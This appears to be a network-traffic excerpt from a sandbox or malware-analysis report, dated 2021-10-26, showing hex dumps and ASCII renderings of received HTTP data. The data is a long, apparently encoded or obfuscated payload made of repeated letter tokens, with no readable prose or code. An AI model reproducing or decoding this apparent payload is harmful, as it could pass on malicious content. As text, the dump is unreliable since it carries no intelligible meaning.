                                                                                                2021-10-26 15:34:19 UTC656INData Raw: 54 55 20 4d 69 53 20 54 4d 50 20 54 4f 54 20 70 70 20 6e 55 20 6e 20 67 55 20 69 69 20 50 70 20 54 4f 4d 20 4d 67 53 20 69 69 20 4d 69 69 20 4d 53 53 20 54 67 4d 20 54 53 54 20 4d 53 6e 20 4d 6e 20 6e 20 54 55 53 20 4d 53 55 20 54 53 53 20 54 55 4f 20 54 50 4f 20 54 6e 67 20 4d 54 69 20 4d 53 50 20 54 50 50 20 54 69 55 20 4d 67 6e 20 54 69 53 20 69 55 20 55 55 20 6e 69 20 54 67 4d 20 4d 50 67 20 54 53 54 20 4d 67 4f 20 70 4d 20 6e 54 20 4d 4d 50 20 54 67 50 20 4d 67 67 20 54 6e 69 20 69 53 20 54 4f 69 20 54 6e 20 4d 54 6e 20 54 70 55 20 4d 54 67 20 54 50 50 20 67 50 20 54 4f 69 20 4d 4d 54 20 4d 50 67 20 69 6e 20 54 67 20 69 55 20 54 70 69 20 4d 4d 69 20 67 50 20 54 53 6e 20 54 6e 4d 20 70 67 20 4d 4f 20 69 67 20 54 50 4f 20 54 50 4f 20 50 4d 20 4f 4d 20
                                                                                                Data Ascii: TU MiS TMP TOT pp nU n gU ii Pp TOM MgS ii Mii MSS TgM TST MSn Mn n TUS MSU TSS TUO TPO Tng MTi MSP TPP TiU Mgn TiS iU UU ni TgM MPg TST MgO pM nT MMP TgP Mgg Tni iS TOi Tn MTn TpU MTg TPP gP TOi MMT MPg in Tg iU Tpi MMi gP TSn TnM pg MO ig TPO TPO PM OM
                                                                                                2021-10-26 15:34:19 UTC672INData Raw: 53 20 4d 54 70 20 54 4f 50 20 4d 69 54 20 50 6e 20 54 6e 54 20 4d 69 70 20 4d 67 55 20 70 54 20 54 4d 54 20 67 6e 20 54 50 4f 20 6e 70 20 70 50 20 54 69 6e 20 4d 67 4f 20 69 20 4d 54 4f 20 6e 4d 20 4d 67 6e 20 4d 54 55 20 54 69 55 20 4d 67 4d 20 67 70 20 54 67 50 20 70 4f 20 54 67 20 4d 4d 70 20 54 54 70 20 4d 69 69 20 4f 50 20 4d 54 55 20 54 50 53 20 54 4d 20 4f 4f 20 54 53 4d 20 54 69 69 20 54 55 53 20 69 54 20 4d 54 4d 20 4d 53 53 20 69 4d 20 54 70 53 20 4d 50 67 20 67 69 20 54 69 70 20 54 70 50 20 4d 54 53 20 54 69 50 20 4d 50 20 70 4f 20 6e 69 20 4d 67 4d 20 54 54 4d 20 53 20 4d 4d 4d 20 69 4f 20 54 6e 4d 20 54 4d 50 20 54 69 50 20 54 69 20 54 53 67 20 4d 54 67 20 54 6e 20 4d 53 54 20 70 50 20 54 4f 50 20 54 55 53 20 4d 50 4d 20 4d 67 4f 20 54 6e 53
                                                                                                Data Ascii: S MTp TOP MiT Pn TnT Mip MgU pT TMT gn TPO np pP Tin MgO i MTO nM Mgn MTU TiU MgM gp TgP pO Tg MMp TTp Mii OP MTU TPS TM OO TSM Tii TUS iT MTM MSS iM TpS MPg gi Tip TpP MTS TiP MP pO ni MgM TTM S MMM iO TnM TMP TiP Ti TSg MTg Tn MST pP TOP TUS MPM MgO TnS
                                                                                                2021-10-26 15:34:19 UTC688INData Raw: 20 6e 55 20 54 70 55 20 54 53 6e 20 69 54 20 54 69 4d 20 54 54 70 20 4d 54 55 20 4f 55 20 54 53 53 20 6e 55 20 67 4d 20 4d 4d 54 20 54 67 20 4d 55 20 4d 54 67 20 54 50 50 20 4d 69 4f 20 54 69 53 20 4d 54 53 20 69 53 20 50 67 20 6e 4f 20 54 6e 55 20 54 53 55 20 4d 69 69 20 4d 67 50 20 55 20 54 4f 53 20 6e 67 20 4d 4d 54 20 54 6e 55 20 54 4d 54 20 54 67 53 20 67 20 4d 20 55 55 20 55 69 20 54 4d 4f 20 54 53 70 20 4d 69 54 20 55 4f 20 53 20 69 55 20 54 53 20 54 4d 54 20 54 67 67 20 54 70 67 20 54 69 20 54 54 53 20 50 50 20 4d 67 54 20 54 69 54 20 4d 53 6e 20 4d 54 70 20 4d 4d 6e 20 54 6e 67 20 4d 53 69 20 54 53 4f 20 69 4d 20 54 69 69 20 54 50 6e 20 54 54 67 20 6e 67 20 67 67 20 4d 53 69 20 54 70 70 20 53 20 4d 50 67 20 54 55 50 20 4d 70 20 54 4f 69 20 4d 50
                                                                                                Data Ascii: nU TpU TSn iT TiM TTp MTU OU TSS nU gM MMT Tg MU MTg TPP MiO TiS MTS iS Pg nO TnU TSU Mii MgP U TOS ng MMT TnU TMT TgS g M UU Ui TMO TSp MiT UO S iU TS TMT Tgg Tpg Ti TTS PP MgT TiT MSn MTp MMn Tng MSi TSO iM Tii TPn TTg ng gg MSi Tpp S MPg TUP Mp TOi MP
                                                                                                2021-10-26 15:34:19 UTC704INData Raw: 20 4d 50 69 20 54 4d 20 67 20 53 20 54 54 54 20 67 69 20 53 20 53 20 54 53 20 53 20 4d 4d 53 20 4d 4d 54 20 54 50 4f 20 53 20 53 20 53 20 4d 50 69 20 54 4d 20 54 20 53 20 67 4d 20 54 20 53 20 53 20 53 20 55 55 20 67 4d 20 53 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 54 20 53 20 70 4f 20 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 54 54 50 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 54 67 54 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 4d 54 54 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 4d 4d 54 20 54 53 67 20 53 20 53 20 53 20 4d 50 69 20 54 4d 20 4d 20 53 20 4d 50 69 20 54 69 20 54 20 53 20 4d 50 69 20 54 4d 20 53 20 53 20 67 4d 20 4d 50 69 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 70 54 20 54 53 20 53 20 53 20 53 20 67 4d 20 54 20 53 20 53 20 53 20 50 70 20 69 20 53
                                                                                                Data Ascii: MPi TM g S TTT gi S S TS S MMS MMT TPO S S S MPi TM T S gM T S S S UU gM S S S S MPi Ti T S pO i S S S S S S S TTP MPP MPP MPP TgT MPP MPP MPP MTT MPP MPP MPP MMT TSg S S S MPi TM M S MPi Ti T S MPi TM S S gM MPi MPP MPP MPP pT TS S S S gM T S S S Pp i S
                                                                                                2021-10-26 15:34:19 UTC720INData Raw: 20 54 69 20 67 20 53 20 54 54 69 20 70 53 20 4d 20 69 20 54 54 4d 20 54 54 69 20 4d 54 50 20 4d 20 69 20 54 54 4d 20 69 53 20 4d 50 20 53 20 53 20 70 20 54 54 54 20 6e 55 20 53 20 53 20 54 53 20 54 54 69 20 4d 67 6e 20 4d 20 69 20 54 54 4d 20 54 54 54 20 69 54 20 53 20 53 20 54 53 20 4d 50 69 20 54 69 20 70 20 53 20 69 67 20 70 20 4d 50 69 20 4d 4d 20 55 4f 20 53 20 53 20 54 20 4d 50 69 20 54 4d 20 70 20 53 20 50 6e 20 4d 69 20 53 20 53 20 53 20 67 4d 20 67 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 67 20 53 20 67 4d 20 54 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 53 20 53 20 50 70 20 4d 50 53 20 6e 20 53 20 53 20 53 20 53 20 67 4d 20 50 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 67 20 53 20 54 54 69 20 4d 69 6e 20 4d 20 69 20 54 54 4d 20 54 54 69 20 69 6e
                                                                                                Data Ascii: Ti g S TTi pS M i TTM TTi MTP M i TTM iS MP S S p TTT nU S S TS TTi Mgn M i TTM TTT iT S S TS MPi Ti p S ig p MPi MM UO S S T MPi TM p S Pn Mi S S S gM g S S S MPi Ti g S gM T S S S MPi Ti S S Pp MPS n S S S S gM P S S S MPi Ti g S TTi Min M i TTM TTi in
                                                                                                2021-10-26 15:34:19 UTC736INData Raw: 4d 20 53 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 4d 20 53 20 70 4f 20 4d 54 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 67 4f 20 4d 50 69 20 4d 50 50 20 4d 50 50 20 50 69 20 4d 50 69 20 4d 50 50 20 4d 50 50 20 6e 70 20 4d 50 69 20 4d 50 50 20 4d 50 50 20 54 54 53 20 4d 50 69 20 4d 50 50 20 4d 50 50 20 54 67 70 20 4d 50 69 20 4d 50 50 20 4d 50 50 20 54 50 69 20 4d 50 69 20 4d 50 50 20 4d 50 50 20 54 70 54 20 4d 50 69 20 4d 50 50 20 4d 50 50 20 54 55 70 20 4d 50 69 20 4d 50 50 20 4d 50 50 20 4d 53 4f 20 4d 50 69 20 4d 50 50 20 4d 50 50 20 4d 67 6e 20 4d 50 69 20 4d 50 50 20 4d 50 50 20 55 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 67 69 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 50 4d 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 50 4f 20 4d 50 50 20 4d 50 50 20 4d 50
                                                                                                Data Ascii: M S S S S MPi Ti M S pO MT S S S S S S S gO MPi MPP MPP Pi MPi MPP MPP np MPi MPP MPP TTS MPi MPP MPP Tgp MPi MPP MPP TPi MPi MPP MPP TpT MPi MPP MPP TUp MPi MPP MPP MSO MPi MPP MPP Mgn MPi MPP MPP U MPP MPP MPP gi MPP MPP MPP PM MPP MPP MPP PO MPP MPP MP
                                                                                                2021-10-26 15:34:19 UTC752INData Raw: 54 20 50 6e 20 54 50 6e 20 67 6e 20 67 4d 20 54 4d 20 53 20 53 20 53 20 67 54 20 50 70 20 54 50 6e 20 67 6e 20 67 4d 20 54 4d 20 53 20 53 20 53 20 67 54 20 50 4d 20 54 50 6e 20 67 6e 20 67 4d 20 54 4d 20 53 20 53 20 53 20 67 54 20 50 54 20 54 50 6e 20 67 6e 20 67 54 20 54 4d 20 67 54 20 4f 6e 20 54 50 6e 20 67 6e 20 67 4d 20 54 54 20 53 20 53 20 53 20 67 54 20 69 55 20 54 50 6e 20 67 6e 20 67 4d 20 54 54 20 53 20 53 20 53 20 67 54 20 50 54 20 54 50 6e 20 67 6e 20 67 4d 20 54 54 20 53 20 53 20 53 20 67 54 20 4f 6e 20 54 50 6e 20 67 6e 20 67 4d 20 54 54 20 53 20 53 20 53 20 67 54 20 50 4d 20 54 50 6e 20 67 6e 20 67 54 20 54 54 20 67 54 20 54 53 54 20 54 50 6e 20 67 6e 20 67 4d 20 54 53 20 53 20 53 20 53 20 67 54 20 50 4d 20 54 50 6e 20 67 6e 20 67 4d 20 54
                                                                                                Data Ascii: T Pn TPn gn gM TM S S S gT Pp TPn gn gM TM S S S gT PM TPn gn gM TM S S S gT PT TPn gn gT TM gT On TPn gn gM TT S S S gT iU TPn gn gM TT S S S gT PT TPn gn gM TT S S S gT On TPn gn gM TT S S S gT PM TPn gn gT TT gT TST TPn gn gM TS S S S gT PM TPn gn gM T
                                                                                                2021-10-26 15:34:19 UTC768INData Raw: 20 4d 67 20 67 54 20 4d 6e 20 54 50 55 20 54 4d 55 20 54 54 69 20 54 20 53 20 69 20 67 54 20 54 4d 20 54 69 54 20 69 55 20 53 20 53 20 54 20 67 6e 20 4d 53 55 20 54 50 70 20 4d 20 53 20 69 20 69 53 20 54 55 4f 20 53 20 53 20 54 53 20 54 4d 55 20 54 54 50 20 54 20 53 20 69 20 67 54 20 4d 6e 20 54 69 54 20 69 55 20 53 20 53 20 54 20 67 6e 20 4d 53 55 20 54 50 6e 20 4d 20 53 20 69 20 69 53 20 54 55 4f 20 53 20 53 20 54 53 20 54 4d 55 20 54 54 70 20 54 20 53 20 69 20 69 4d 20 53 20 53 20 54 4f 20 69 55 20 67 20 53 20 70 50 20 53 20 53 20 53 20 69 67 20 53 20 53 20 54 6e 20 53 20 54 4d 70 20 69 70 20 53 20 53 20 54 53 20 54 54 20 4d 20 54 4d 20 53 20 55 20 54 67 20 4f 20 69 53 20 54 67 4f 20 53 20 53 20 70 20 69 53 20 69 53 20 53 20 53 20 54 53 20 4d 4d 20 69
                                                                                                Data Ascii: Mg gT Mn TPU TMU TTi T S i gT TM TiT iU S S T gn MSU TPp M S i iS TUO S S TS TMU TTP T S i gT Mn TiT iU S S T gn MSU TPn M S i iS TUO S S TS TMU TTp T S i iM S S TO iU g S pP S S S ig S S Tn S TMp ip S S TS TT M TM S U Tg O iS TgO S S p iS iS S S TS MM i
                                                                                                2021-10-26 15:34:19 UTC784INData Raw: 70 20 54 4d 55 20 4f 4f 20 54 69 70 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 70 50 20 54 69 4d 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 54 69 67 20 54 67 4f 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 67 50 20 54 50 4d 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 4d 53 4f 20 69 70 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 54 4d 67 20 54 70 50 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 54 4d 69 20 54 54 4d 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 54 4d 50 20 67 55 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 4d 4d 50 20 4f 54 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 4d 67 53 20 50 6e 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 54 70 67 20 54 70 6e 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 4d 50 69 20 54 53 6e 20 4d 50 53 20 54 53
                                                                                                Data Ascii: p TMU OO Tip MPS TS Up TMU pP TiM MPS TS Up TMU Tig TgO MPS TS Up TMU gP TPM MPS TS Up TMU MSO ip MPS TS Up TMU TMg TpP MPS TS Up TMU TMi TTM MPS TS Up TMU TMP gU MPS TS Up TMU MMP OT MPS TS Up TMU MgS Pn MPS TS Up TMU Tpg Tpn MPS TS Up TMU MPi TSn MPS TS
                                                                                                2021-10-26 15:34:19 UTC800INData Raw: 20 54 69 69 20 54 20 54 69 67 20 67 20 4f 20 53 20 54 69 55 20 54 20 54 69 55 20 67 20 4f 20 53 20 54 50 4d 20 54 20 54 50 67 20 67 20 4f 20 53 20 54 50 70 20 54 20 54 50 55 20 67 20 4f 20 53 20 54 70 53 20 54 20 54 70 67 20 67 20 4f 20 53 20 54 70 69 20 54 20 54 70 55 20 67 20 4f 20 53 20 54 70 55 20 54 20 54 6e 67 20 67 20 4f 20 53 20 54 6e 4d 20 54 20 54 6e 55 20 67 20 4f 20 53 20 54 6e 70 20 54 20 54 55 67 20 67 20 4f 20 53 20 54 55 53 20 54 20 54 55 55 20 67 20 4f 20 53 20 54 55 69 20 54 20 54 4f 67 20 67 20 4f 20 53 20 54 55 55 20 54 20 54 4f 55 20 67 20 4f 20 53 20 54 4f 4d 20 54 20 4d 53 67 20 67 20 4f 20 53 20 54 4f 70 20 54 20 4d 53 55 20 67 20 4f 20 53 20 4d 53 53 20 54 20 4d 54 67 20 67 20 4f 20 53 20 4d 53 69 20 54 20 4d 54 55 20 67 20 4f 20
                                                                                                Data Ascii: Tii T Tig g O S TiU T TiU g O S TPM T TPg g O S TPp T TPU g O S TpS T Tpg g O S Tpi T TpU g O S TpU T Tng g O S TnM T TnU g O S Tnp T TUg g O S TUS T TUU g O S TUi T TOg g O S TUU T TOU g O S TOM T MSg g O S TOp T MSU g O S MSS T MTg g O S MSi T MTU g O
                                                                                                2021-10-26 15:34:19 UTC816INData Raw: 4d 20 4f 6e 20 54 54 53 20 54 53 53 20 54 53 55 20 54 53 54 20 53 20 70 6e 20 54 53 55 20 54 54 54 20 54 54 50 20 54 53 54 20 6e 4d 20 4f 6e 20 54 54 53 20 54 53 53 20 54 53 55 20 54 53 54 20 53 20 6e 54 20 54 53 54 20 54 54 70 20 55 69 20 54 4d 54 20 54 54 4d 20 54 53 54 20 6e 53 20 54 54 69 20 54 54 54 20 54 53 4f 20 6e 4d 20 4f 6e 20 54 54 53 20 54 53 53 20 54 53 55 20 54 53 54 20 53 20 54 53 67 20 54 53 54 20 54 54 70 20 4f 50 20 6e 6e 20 4f 6e 20 54 53 50 20 54 54 53 20 55 6e 20 54 53 50 20 54 54 53 20 54 53 53 20 54 54 54 20 54 54 4f 20 6e 4d 20 4f 6e 20 54 54 53 20 54 53 53 20 54 53 55 20 54 53 54 20 53 20 54 53 69 20 4f 6e 20 54 54 53 20 54 53 53 20 54 53 55 20 54 53 54 20 53 20 6e 53 20 54 53 50 20 54 53 55 20 54 53 54 20 53 20 6e 67 20 54 54 50
                                                                                                Data Ascii: M On TTS TSS TSU TST S pn TSU TTT TTP TST nM On TTS TSS TSU TST S nT TST TTp Ui TMT TTM TST nS TTi TTT TSO nM On TTS TSS TSU TST S TSg TST TTp OP nn On TSP TTS Un TSP TTS TSS TTT TTO nM On TTS TSS TSU TST S TSi On TTS TSS TSU TST S nS TSP TSU TST S ng TTP
                                                                                                2021-10-26 15:34:19 UTC832INData Raw: 54 4d 4f 20 4d 67 69 20 54 50 6e 20 54 50 53 20 4d 67 69 20 54 50 6e 20 54 69 67 20 4d 67 69 20 54 50 6e 20 54 6e 54 20 4d 67 69 20 54 50 6e 20 54 69 70 20 4d 67 69 20 54 50 6e 20 54 69 67 20 4d 67 69 20 54 50 55 20 54 4d 55 20 53 20 4d 4d 70 20 54 50 4f 20 54 6e 67 20 4d 4d 70 20 54 50 55 20 54 55 4f 20 4d 4d 70 20 54 50 55 20 54 55 69 20 4d 4d 70 20 54 50 4f 20 54 4d 4f 20 4d 4d 70 20 54 50 55 20 54 4f 54 20 4d 4d 70 20 54 50 55 20 54 55 69 20 4d 4d 70 20 54 50 4f 20 54 6e 69 20 4d 4d 70 20 54 50 55 20 54 55 69 20 4d 4d 70 20 54 50 55 20 54 55 55 20 4d 4d 70 20 54 50 4f 20 54 4f 54 20 4d 4d 70 20 54 50 4f 20 54 50 6e 20 4d 4d 70 20 54 70 53 20 54 4d 4f 20 4d 4d 70 20 54 50 4f 20 54 55 70 20 4d 4d 70 20 54 50 4f 20 54 67 55 20 4d 4d 70 20 54 50 4f 20 54
                                                                                                Data Ascii: TMO Mgi TPn TPS Mgi TPn Tig Mgi TPn TnT Mgi TPn Tip Mgi TPn Tig Mgi TPU TMU S MMp TPO Tng MMp TPU TUO MMp TPU TUi MMp TPO TMO MMp TPU TOT MMp TPU TUi MMp TPO Tni MMp TPU TUi MMp TPU TUU MMp TPO TOT MMp TPO TPn MMp TpS TMO MMp TPO TUp MMp TPO TgU MMp TPO T
                                                                                                2021-10-26 15:34:19 UTC848INData Raw: 4d 4d 50 20 54 55 4f 20 54 67 69 20 53 20 4d 67 4f 20 54 67 70 20 54 50 55 20 4d 67 4f 20 54 67 70 20 54 50 6e 20 4d 67 4f 20 54 67 70 20 54 50 55 20 4d 67 4f 20 54 67 70 20 54 50 54 20 4d 67 4f 20 54 67 6e 20 54 69 54 20 4d 67 4f 20 54 67 70 20 54 50 67 20 4d 67 4f 20 54 67 6e 20 54 67 50 20 4d 67 4f 20 54 67 70 20 54 50 6e 20 4d 67 4f 20 54 67 70 20 54 50 6e 20 4d 67 4f 20 54 67 70 20 54 50 55 20 4d 67 4f 20 54 67 6e 20 54 69 50 20 4d 67 4f 20 54 67 70 20 54 50 54 20 4d 67 4f 20 54 67 6e 20 54 67 55 20 4d 67 4f 20 54 67 70 20 54 50 53 20 4d 67 4f 20 54 67 6e 20 54 67 50 20 53 20 4d 4d 70 20 54 69 67 20 54 6e 55 20 4d 4d 70 20 54 69 67 20 54 67 53 20 4d 4d 70 20 54 69 67 20 54 67 4d 20 4d 4d 70 20 54 69 67 20 54 50 70 20 4d 4d 70 20 54 69 67 20 54 4d 4f
                                                                                                Data Ascii: MMP TUO Tgi S MgO Tgp TPU MgO Tgp TPn MgO Tgp TPU MgO Tgp TPT MgO Tgn TiT MgO Tgp TPg MgO Tgn TgP MgO Tgp TPn MgO Tgp TPn MgO Tgp TPU MgO Tgn TiP MgO Tgp TPT MgO Tgn TgU MgO Tgp TPS MgO Tgn TgP S MMp Tig TnU MMp Tig TgS MMp Tig TgM MMp Tig TPp MMp Tig TMO
                                                                                                2021-10-26 15:34:19 UTC864INData Raw: 55 20 54 70 4d 20 54 69 4d 20 4d 67 55 20 54 70 4d 20 54 69 50 20 4d 67 55 20 54 70 4d 20 54 67 4f 20 4d 67 55 20 54 70 4d 20 54 69 53 20 4d 67 55 20 54 70 4d 20 54 67 55 20 4d 67 55 20 54 70 67 20 54 69 4d 20 53 20 4d 67 53 20 54 6e 4d 20 54 6e 4f 20 4d 67 53 20 54 6e 67 20 54 67 70 20 4d 67 53 20 54 6e 4d 20 54 69 4f 20 4d 67 53 20 54 6e 4d 20 54 6e 50 20 4d 67 53 20 54 6e 4d 20 54 69 69 20 4d 67 53 20 54 6e 4d 20 54 70 53 20 4d 67 53 20 54 6e 4d 20 54 6e 54 20 4d 67 53 20 54 6e 4d 20 54 50 4f 20 4d 67 53 20 54 6e 4d 20 54 4f 54 20 4d 67 53 20 54 6e 67 20 54 67 4d 20 4d 67 53 20 54 6e 4d 20 54 69 4d 20 4d 67 53 20 54 6e 4d 20 54 70 54 20 4d 67 53 20 54 6e 4d 20 54 6e 69 20 4d 67 53 20 54 6e 4d 20 54 69 69 20 4d 67 53 20 54 6e 4d 20 54 69 4d 20 53 20 4d
                                                                                                Data Ascii: U TpM TiM MgU TpM TiP MgU TpM TgO MgU TpM TiS MgU TpM TgU MgU Tpg TiM S MgS TnM TnO MgS Tng Tgp MgS TnM TiO MgS TnM TnP MgS TnM Tii MgS TnM TpS MgS TnM TnT MgS TnM TPO MgS TnM TOT MgS Tng TgM MgS TnM TiM MgS TnM TpT MgS TnM Tni MgS TnM Tii MgS TnM TiM S M
                                                                                                2021-10-26 15:34:19 UTC879INData Raw: 20 54 69 6e 20 4d 4d 6e 20 54 50 54 20 54 69 50 20 4d 4d 6e 20 54 50 54 20 54 69 55 20 4d 4d 6e 20 54 50 4d 20 54 67 67 20 4d 4d 6e 20 54 50 54 20 54 50 53 20 53 20 4d 67 55 20 54 50 54 20 54 4d 55 20 4d 67 55 20 54 50 54 20 54 4d 4f 20 4d 67 55 20 54 50 53 20 54 55 50 20 4d 67 55 20 54 50 54 20 54 70 4f 20 4d 67 55 20 54 50 54 20 54 50 70 20 4d 67 55 20 54 50 53 20 54 55 6e 20 4d 67 55 20 54 50 54 20 54 4d 4f 20 4d 67 55 20 54 50 54 20 54 70 4f 20 4d 67 55 20 54 50 53 20 54 55 4f 20 4d 67 55 20 54 50 4d 20 54 4d 4f 20 4d 67 55 20 54 50 53 20 54 55 69 20 4d 67 55 20 54 50 54 20 54 69 69 20 4d 67 55 20 54 50 54 20 54 6e 69 20 4d 67 55 20 54 50 53 20 54 55 69 20 4d 67 55 20 54 50 54 20 54 50 53 20 53 20 4d 67 54 20 54 50 55 20 54 50 6e 20 4d 67 54 20 54 50
                                                                                                Data Ascii: Tin MMn TPT TiP MMn TPT TiU MMn TPM Tgg MMn TPT TPS S MgU TPT TMU MgU TPT TMO MgU TPS TUP MgU TPT TpO MgU TPT TPp MgU TPS TUn MgU TPT TMO MgU TPT TpO MgU TPS TUO MgU TPM TMO MgU TPS TUi MgU TPT Tii MgU TPT Tni MgU TPS TUi MgU TPT TPS S MgT TPU TPn MgT TP
                                                                                                2021-10-26 15:34:19 UTC895INData Raw: 50 69 20 4d 4d 70 20 54 55 55 20 54 50 54 20 4d 4d 70 20 54 55 4f 20 54 67 50 20 4d 4d 70 20 54 55 55 20 54 50 53 20 4d 4d 70 20 54 55 55 20 54 50 67 20 4d 4d 70 20 54 55 4f 20 54 69 69 20 4d 4d 70 20 54 55 4f 20 54 70 53 20 4d 4d 70 20 54 55 4f 20 54 50 55 20 4d 4d 70 20 54 55 55 20 54 55 54 20 4d 4d 70 20 54 55 55 20 54 50 54 20 4d 4d 70 20 54 55 55 20 54 50 70 20 53 20 4d 67 50 20 54 67 4d 20 54 4d 55 20 4d 67 50 20 54 67 4d 20 54 69 67 20 4d 67 50 20 54 67 67 20 54 67 67 20 4d 67 50 20 54 67 4d 20 54 70 69 20 4d 67 50 20 54 67 4d 20 54 6e 4d 20 4d 67 50 20 54 67 4d 20 54 6e 4f 20 4d 67 50 20 54 67 4d 20 54 4d 4f 20 4d 67 50 20 54 67 54 20 54 55 6e 20 4d 67 50 20 54 67 4d 20 54 67 53 20 4d 67 50 20 54 67 54 20 54 55 4f 20 4d 67 50 20 54 67 4d 20 54 50
                                                                                                Data Ascii: Pi MMp TUU TPT MMp TUO TgP MMp TUU TPS MMp TUU TPg MMp TUO Tii MMp TUO TpS MMp TUO TPU MMp TUU TUT MMp TUU TPT MMp TUU TPp S MgP TgM TMU MgP TgM Tig MgP Tgg Tgg MgP TgM Tpi MgP TgM TnM MgP TgM TnO MgP TgM TMO MgP TgT TUn MgP TgM TgS MgP TgT TUO MgP TgM TP
                                                                                                2021-10-26 15:34:19 UTC911INData Raw: 20 4d 67 4d 20 54 70 54 20 54 67 4d 20 4d 67 4d 20 54 70 53 20 54 4f 53 20 4d 67 4d 20 54 70 54 20 54 6e 55 20 4d 67 4d 20 54 70 54 20 54 67 4d 20 4d 67 4d 20 54 70 54 20 54 6e 70 20 4d 67 4d 20 54 70 4d 20 54 67 67 20 4d 67 4d 20 54 70 54 20 54 4d 4f 20 4d 67 4d 20 54 70 54 20 54 6e 50 20 4d 67 4d 20 54 70 54 20 54 67 67 20 4d 67 4d 20 54 70 54 20 54 6e 6e 20 4d 67 4d 20 54 70 54 20 54 69 50 20 4d 67 4d 20 54 70 54 20 54 67 54 20 4d 67 4d 20 54 70 54 20 54 6e 69 20 4d 67 4d 20 54 70 53 20 54 55 4f 20 4d 67 4d 20 54 70 54 20 54 70 67 20 53 20 4d 4d 50 20 54 70 50 20 54 55 70 20 4d 4d 50 20 54 70 70 20 54 67 53 20 4d 4d 50 20 54 70 50 20 54 70 53 20 4d 4d 50 20 54 70 50 20 54 50 4f 20 4d 4d 50 20 54 70 70 20 54 4d 4f 20 4d 4d 50 20 54 70 70 20 54 70 67 20
                                                                                                Data Ascii: MgM TpT TgM MgM TpS TOS MgM TpT TnU MgM TpT TgM MgM TpT Tnp MgM TpM Tgg MgM TpT TMO MgM TpT TnP MgM TpT Tgg MgM TpT Tnn MgM TpT TiP MgM TpT TgT MgM TpT Tni MgM TpS TUO MgM TpT Tpg S MMP TpP TUp MMP Tpp TgS MMP TpP TpS MMP TpP TPO MMP Tpp TMO MMP Tpp Tpg
                                                                                                2021-10-26 15:34:19 UTC927INData Raw: 20 54 55 69 20 54 70 4f 20 4d 67 67 20 54 55 67 20 54 55 67 20 4d 67 67 20 54 55 67 20 54 55 4d 20 4d 67 67 20 54 55 67 20 54 6e 4f 20 4d 67 67 20 54 55 67 20 54 55 70 20 4d 67 67 20 54 55 67 20 54 55 69 20 4d 67 67 20 54 55 69 20 54 69 6e 20 4d 67 67 20 54 55 67 20 54 55 6e 20 4d 67 67 20 54 55 69 20 54 67 50 20 4d 67 67 20 54 55 67 20 54 55 69 20 4d 67 67 20 54 55 69 20 54 70 6e 20 4d 67 67 20 54 55 67 20 54 6e 4f 20 4d 67 67 20 54 55 67 20 54 55 70 20 4d 67 67 20 54 55 69 20 54 50 6e 20 4d 67 67 20 54 55 69 20 54 70 4f 20 53 20 4d 4d 55 20 54 55 70 20 54 69 50 20 4d 4d 55 20 54 55 50 20 54 55 55 20 4d 4d 55 20 54 55 50 20 54 55 67 20 4d 4d 55 20 54 55 50 20 54 55 67 20 4d 4d 55 20 54 55 70 20 54 50 4f 20 4d 4d 55 20 54 55 70 20 54 69 4f 20 4d 4d 55 20
                                                                                                Data Ascii: TUi TpO Mgg TUg TUg Mgg TUg TUM Mgg TUg TnO Mgg TUg TUp Mgg TUg TUi Mgg TUi Tin Mgg TUg TUn Mgg TUi TgP Mgg TUg TUi Mgg TUi Tpn Mgg TUg TnO Mgg TUg TUp Mgg TUi TPn Mgg TUi TpO S MMU TUp TiP MMU TUP TUU MMU TUP TUg MMU TUP TUg MMU TUp TPO MMU TUp TiO MMU
                                                                                                2021-10-26 15:34:19 UTC943INData Raw: 20 54 4f 53 20 4d 4d 55 20 54 55 53 20 54 69 70 20 4d 4d 55 20 54 55 53 20 54 67 67 20 4d 4d 55 20 54 55 53 20 54 6e 70 20 4d 4d 55 20 54 55 53 20 54 50 50 20 4d 4d 55 20 54 55 53 20 54 55 53 20 4d 4d 55 20 54 55 53 20 54 4d 4f 20 4d 4d 55 20 54 55 53 20 54 67 69 20 4d 4d 55 20 54 55 54 20 54 4d 4f 20 4d 4d 55 20 54 55 53 20 54 6e 6e 20 53 20 4d 67 4d 20 54 55 54 20 54 69 50 20 4d 67 4d 20 54 55 53 20 54 55 53 20 4d 67 4d 20 54 55 53 20 54 55 67 20 4d 67 4d 20 54 55 53 20 54 55 54 20 4d 67 4d 20 54 55 54 20 54 69 53 20 4d 67 4d 20 54 55 54 20 54 6e 6e 20 4d 67 4d 20 54 55 53 20 54 6e 6e 20 4d 67 4d 20 54 55 53 20 54 55 54 20 4d 67 4d 20 54 55 53 20 54 6e 4f 20 4d 67 4d 20 54 55 53 20 54 55 67 20 4d 67 4d 20 54 55 53 20 54 55 53 20 4d 67 4d 20 54 55 54 20
                                                                                                Data Ascii: TOS MMU TUS Tip MMU TUS Tgg MMU TUS Tnp MMU TUS TPP MMU TUS TUS MMU TUS TMO MMU TUS Tgi MMU TUT TMO MMU TUS Tnn S MgM TUT TiP MgM TUS TUS MgM TUS TUg MgM TUS TUT MgM TUT TiS MgM TUT Tnn MgM TUS Tnn MgM TUS TUT MgM TUS TnO MgM TUS TUg MgM TUS TUS MgM TUT
